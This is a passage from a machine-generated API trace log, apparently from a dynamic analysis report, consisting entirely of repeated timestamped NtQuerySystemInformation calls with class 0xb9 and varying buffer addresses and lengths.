Length=0x28, ResultLength=0x0) [0273.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x20, ResultLength=0x0) [0273.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0273.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0273.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0273.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0273.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8c0, Length=0x58, ResultLength=0x0) [0273.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0273.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0273.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0273.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0273.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0273.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0273.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0273.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0273.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8c0, Length=0x58, ResultLength=0x0) [0273.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0273.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x28, ResultLength=0x0) [0273.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x28, ResultLength=0x0) [0273.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x28, ResultLength=0x0) [0273.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x28, ResultLength=0x0) [0273.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0273.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0273.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0273.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x28, ResultLength=0x0) [0273.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x28, ResultLength=0x0) [0273.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0273.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0273.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x20, ResultLength=0x0) [0273.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4c0, Length=0x20, ResultLength=0x0) [0273.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4c0, Length=0x20, ResultLength=0x0) [0273.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4c0, Length=0x20, ResultLength=0x0) [0273.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0273.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0273.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0273.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0273.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0273.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0273.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0273.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0273.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0273.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0273.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0273.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0273.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0273.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0273.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0273.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb28, Length=0x50, ResultLength=0x0) [0273.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0273.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc880, Length=0x28, ResultLength=0x0) [0273.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc880, Length=0x28, ResultLength=0x0) [0273.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc880, Length=0x28, ResultLength=0x0) [0273.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc880, Length=0x28, ResultLength=0x0) [0273.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x28, ResultLength=0x0) [0273.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0273.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x28, ResultLength=0x0) [0273.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x28, ResultLength=0x0) [0273.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0273.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x20, ResultLength=0x0) [0273.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x20, ResultLength=0x0) [0273.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x20, ResultLength=0x0) [0273.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x20, ResultLength=0x0) [0273.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0273.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x20, ResultLength=0x0) [0273.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x20, ResultLength=0x0) [0273.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x20, ResultLength=0x0) [0273.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d0, Length=0x50, ResultLength=0x0) [0273.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x38, ResultLength=0x0) [0273.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0273.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0273.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0273.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0273.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x28, ResultLength=0x0) [0273.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 